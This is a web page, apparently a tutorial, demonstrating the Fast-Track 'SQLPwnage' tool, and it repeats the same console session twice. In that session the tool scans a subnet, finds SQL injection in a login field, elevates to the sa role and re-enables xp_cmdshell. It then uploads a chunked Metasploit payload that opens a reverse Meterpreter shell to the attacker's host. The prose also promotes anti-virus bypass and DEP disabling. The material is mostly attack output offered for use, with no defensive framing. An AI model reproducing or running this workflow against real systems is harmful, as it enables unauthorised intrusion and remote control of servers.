SQL Pwnage

'SQLPwnage' is an insane tool for detecting potential SQL Injection vulnerabilities within a web application. SQLPwnage will scan subnets and crawl entire URLs looking for any type of POST parameters. SQLPwnage will try both Error and Blind based SQL Injection in an attempt to gain full access to the system. If it can guess the proper SQL Syntax, it will do a series of attacks including re-enabling xp_cmdshell and delivering whatever payload you want, all through SQL Injection. Using the example below, we will automatically crawl and attack a site we know is vulnerable to SQL Injection. SQLPwnage was written by Andrew Weidenhamer and David Kennedy. Let's see what happens.

Fast-Track Main Menu: Fast-Track - Where it's OK to finish in under 3 minutes... Version: v4.0 Written by: David Kennedy (ReL1K) http://www.securestate.com http://www.thepentest.com 1. Fast-Track Updates 2. Autopwn Automation 3. Microsoft SQL Tools 4. Mass Client-Side Attack 5. Exploits 6. Binary to Hex Payload Converter 7. Payload Generator 8. Fast-Track Tutorials 9. Fast-Track Changelog 10. Fast-Track Credits 11. Exit Enter the number: 3 Microsoft SQL Attack Tools Pick a list of the tools from below: 1. MSSQL Injector 2. MSSQL Bruter 3. SQLPwnage Enter your choice : 3 Configuration file not detected, running default path. Recommend running setup.py install to configure Fast-Track. Default Metasploit directory set to /pentest/exploits/framework3/ Checking SQLPwnage dependencies required to run... Dependencies installed. Welcome to SQLPwnage. SQLPwnage written by: Andrew Weidenhamer and David Kennedy SQLPwnage is a mass pwnage tool custom coded for Fast-Track. SQLPwnage will attempt to identify SQL Injection in a website, scan subnet ranges for web servers, crawl entire sites, fuzz form parameters and attempt to gain you remote access to a system. We useunique attacks never performed before in order to bypass the 64kb debug restrictions on remote Windows systems and deploy our large payloads without restrictions This is all done without a stager to download remote files, the only egress connections made are our final payload. Right now SQLPwnage supports three payloads, a reverse tcp shell, metasploit reverse tcp meterpreter, and metasploit reverse vnc inject. Some additional features are, elevation to "sa" role if not added, data execution prevention (DEP) disabling, anti-virus bypassing, and much more! This tool is the only one of its kind, and is currently still in beta. SQLPwnage Main Menu: 1. SQL Injection Search/Exploit by Binary Payload Injection (BLIND) 2. SQL Injection Search/Exploit by Binary Payload Injection (ERROR BASED) 3. SQL Injection single URL exploitation Enter your choice: 2 --------------------------------------------------------------- - This module has the following two options: - - - - 1) Spider a single URL looking for SQL Injection. If - - successful in identifying SQL Injection, it will then - - give you a choice to exploit.- - - - 2) Scan an entire subnet looking for webservers running on - - port 80. The user will then be prompted with two - - choices: 1) Select a website or, 2) Attempt to spider - - all websites that was found during the scan attempting - - to identify possible SQL Injection. If SQL Injection - - is identified, the user will then have an option to - - exploit. - - - - This module is based on error messages that are most - - commonly returned when SQL Injection is prevalent on - - web application. - - - - If all goes well a reverse shell will be returned back to - - the user. - --------------------------------------------------------------- Scan a subnet or spider single URL? 1. url 2. subnet (new) 3. subnet (lists last scan) Enter the Number: 2 Enter the ip range, example 192.168.1.1-254: 10.211.55.1-254 Scanning Complete!!! Select a website to spider or spider all?? 1. Single Website 2. All Websites Enter the Number: 2 Attempting to Spider: http://10.211.55.128 Crawling http://10.211.55.128 (Max Depth: 100000) DONE Found 0 links, following 0 urls in 0+0:0:0 Spidering is complete. ************************************************************************* http://10.211.55.128 ************************************************************************* [+] Number of forms detected: 2 [+] A SQL Exception has been encountered in the "txtLogin" input field of the above website. What type of payload do you want? 1. Custom Packed Fast-Track Reverse Payload (AV Safe) 2. Metasploit Reverse VNC Inject (Requires Metasploit) 3. Metasploit Meterpreter Payload (Requires Metasploit) 4. Metasploit TCP Bind Shell (Requires Metasploit) 5. Metasploit Meterpreter Reflective Reverse TCP 6. Metasploit Reflective Reverse VNC Select your choice: 5 Enter the port you want to listen on: 9090 [+] Importing 64kb debug bypass payload into Fast-Track... [+] [+] Import complete, formatting the payload for delivery.. [+] [+] Payload Formatting prepped and ready for launch. [+] [+] Executing SQL commands to elevate account permissions. [+] [+] Initiating stored procedure: 'xp_cmdhshell' if disabled. [+] [+] Delivery Complete. [+] Created by msfpayload (http://www.metasploit.com). Payload: windows/patchupmeterpreter/reverse_tcp Length: 310 Options: LHOST=10.211.55.130,LPORT=9090 Launching MSFCLI Meterpreter Handler Creating Metasploit Reverse Meterpreter Payload.. Taking raw binary and converting to hex. Raw binary converted to straight hex. [+] Bypassing Windows Debug 64KB Restrictions. Evil. [+] [+] Sending chunked payload. Number 1 of 9. This may take a bit. [+] [+] Sending chunked payload. Number 2 of 9. This may take a bit. [+] [+] Sending chunked payload. Number 3 of 9. This may take a bit. [+] [+] Sending chunked payload. Number 4 of 9. This may take a bit. [+] [+] Sending chunked payload. Number 5 of 9. This may take a bit. [+] [+] Sending chunked payload. Number 6 of 9. This may take a bit. [+] [+] Sending chunked payload. Number 7 of 9. This may take a bit. [+] [+] Sending chunked payload. Number 8 of 9. This may take a bit. [+] [+] Sending chunked payload. Number 9 of 9. This may take a bit. [+] [+] Conversion from hex to binary in progress. [+] [+] Conversion complete. Moving the binary to an executable. [+] [+] Splitting the hex into 100 character chunks [+] [+] Split complete. [+] [+] Prepping the payload for delivery. [+] Sending chunk 1 of 3, this may take a bit... Sending chunk 2 of 3, this may take a bit... Sending chunk 3 of 3, this may take a bit... Using H2B Bypass to convert our Payload to Binary.. Running cleanup before launching the payload.... [+] Launching the PAYLOAD!! This may take up to two or three minutes. [+] [*] Please wait while we load the module tree... [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Starting the payload handler... [*] Transmitting intermediate stager for over-sized stage...(216 bytes) [*] Sending stage (2650 bytes) [*] Sleeping before handling stage... [*] Uploading DLL (718347 bytes)... [*] Upload completed. [*] Meterpreter session 1 opened (10.211.55.130:9090 -> 10.211.55.128:1031) meterpreter >

Phew! Made that look easy... Fast-Track has successfully gained access and delivered the payload all through SQL Injection! What is interesting about all of this is how the actual payload got delivered. Once Fast-Track identifies SQL Injection, it takes the options specified during the initial setup and creates a Metasploit Payload as an executable format. That executable is then converted into a raw hex version, so the output is just a straight blob of hex. A custom payload is delivered to the victim machine that is completely custom to Fast-Track, what this initial payload does is its a 5kb hex based application, it drops the payload in the hex format on the underlying operating system and uses Windows debug to convert the hex format back to a binary based application. The main limitation with this method is that all payloads MUST be under 64KB in size. If the payload is over the size, it will bomb out and not convert the application. Fast-Track's custom payload (5kb) essentially once converted back to a binary reads in raw hex and spits it to a file in a binary format, thus bypassing the 64KB restriction. This method was first introduced by Scott White at SecureState at Defcon in 2008 and is incorporated into the Fast-Track SQLPwnage and SQLBruter attacks.

SQL Pwnage

Fast-Track Main Menu:

Fast-Track - Where it's OK to finish in under 3 minutes...
Version: v4.0
Written by: David Kennedy (ReL1K)
http://www.securestate.com
http://www.thepentest.com

1. Fast-Track Updates
2. Autopwn Automation
3. Microsoft SQL Tools
4. Mass Client-Side Attack
5. Exploits
6. Binary to Hex Payload Converter
7. Payload Generator
8. Fast-Track Tutorials
9. Fast-Track Changelog
10. Fast-Track Credits
11. Exit

Enter the number: 3

Microsoft SQL Attack Tools

Pick a list of the tools from below:

1. MSSQL Injector
2. MSSQL Bruter
3. SQLPwnage

Enter your choice : 3
Configuration file not detected, running default path.
Recommend running setup.py install to configure Fast-Track.
Default Metasploit directory set to /pentest/exploits/framework3/
Checking SQLPwnage dependencies required to run...

Dependencies installed. Welcome to SQLPwnage.


SQLPwnage written by: Andrew Weidenhamer and David Kennedy


SQLPwnage is a mass pwnage tool custom coded for Fast-Track. SQLPwnage will attempt to identify SQL Injection
in a website, scan subnet ranges for web servers, crawl entire sites, fuzz form parameters and 
attempt to gain you remote access to a system. We useunique attacks never performed before in order to bypass 
the 64kb debug restrictions
on remote Windows systems and deploy our large payloads without restrictions


This is all done without a stager to download remote files, the only egress connections
made are our final payload. Right now SQLPwnage supports three payloads, a reverse
tcp shell, metasploit reverse tcp meterpreter, and metasploit reverse vnc inject.

Some additional features are, elevation to "sa" role if not added, data execution prevention
(DEP) disabling, anti-virus bypassing, and much more!

This tool is the only one of its kind, and is currently still in beta.


SQLPwnage Main Menu:


1. SQL Injection Search/Exploit by Binary Payload Injection (BLIND)
2. SQL Injection Search/Exploit by Binary Payload Injection (ERROR BASED)
3. SQL Injection single URL exploitation

Enter your choice: 2

---------------------------------------------------------------
- This module has the following two options: -
- -
- 1) Spider a single URL looking for SQL Injection. If -
- successful in identifying SQL Injection, it will then -
- give you a choice to exploit.-
- -
- 2) Scan an entire subnet looking for webservers running on -
- port 80. The user will then be prompted with two -
- choices: 1) Select a website or, 2) Attempt to spider -
- all websites that was found during the scan attempting -
- to identify possible SQL Injection. If SQL Injection -
- is identified, the user will then have an option to -
- exploit. -
- -
- This module is based on error messages that are most -
- commonly returned when SQL Injection is prevalent on -
- web application. -
- -
- If all goes well a reverse shell will be returned back to -
- the user. -
---------------------------------------------------------------

Scan a subnet or spider single URL?

1. url
2. subnet (new)
3. subnet (lists last scan)

Enter the Number: 2

Enter the ip range, example 192.168.1.1-254: 10.211.55.1-254
Scanning Complete!!! Select a website to spider or spider all??

1. Single Website
2. All Websites

Enter the Number: 2

Attempting to Spider: http://10.211.55.128
Crawling http://10.211.55.128 (Max Depth: 100000)
DONE
Found 0 links, following 0 urls in 0+0:0:0

Spidering is complete.

*************************************************************************
http://10.211.55.128
*************************************************************************


[+] Number of forms detected: 2 [+]

A SQL Exception has been encountered in the "txtLogin" input field of the above website.

What type of payload do you want?

1. Custom Packed Fast-Track Reverse Payload (AV Safe)
2. Metasploit Reverse VNC Inject (Requires Metasploit)
3. Metasploit Meterpreter Payload (Requires Metasploit)
4. Metasploit TCP Bind Shell (Requires Metasploit)
5. Metasploit Meterpreter Reflective Reverse TCP
6. Metasploit Reflective Reverse VNC

Select your choice: 5
Enter the port you want to listen on: 9090
[+] Importing 64kb debug bypass payload into Fast-Track... [+]
[+] Import complete, formatting the payload for delivery.. [+]
[+] Payload Formatting prepped and ready for launch. [+]
[+] Executing SQL commands to elevate account permissions. [+]
[+] Initiating stored procedure: 'xp_cmdhshell' if disabled. [+]
[+] Delivery Complete. [+]
Created by msfpayload (http://www.metasploit.com).
Payload: windows/patchupmeterpreter/reverse_tcp
Length: 310
Options: LHOST=10.211.55.130,LPORT=9090
Launching MSFCLI Meterpreter Handler
Creating Metasploit Reverse Meterpreter Payload..
Taking raw binary and converting to hex.
Raw binary converted to straight hex.
[+] Bypassing Windows Debug 64KB Restrictions. Evil. [+]
[+] Sending chunked payload. Number 1 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 2 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 3 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 4 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 5 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 6 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 7 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 8 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 9 of 9. This may take a bit. [+]
[+] Conversion from hex to binary in progress. [+]
[+] Conversion complete. Moving the binary to an executable. [+]
[+] Splitting the hex into 100 character chunks [+]
[+] Split complete. [+]
[+] Prepping the payload for delivery. [+]
Sending chunk 1 of 3, this may take a bit...
Sending chunk 2 of 3, this may take a bit...
Sending chunk 3 of 3, this may take a bit...
Using H2B Bypass to convert our Payload to Binary..
Running cleanup before launching the payload....
[+] Launching the PAYLOAD!! This may take up to two or three minutes. [+]
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (718347 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (10.211.55.130:9090 -> 10.211.55.128:1031)

meterpreter >

Username
Password
Remember me

System message

SQL Pwnage

SQL Pwnage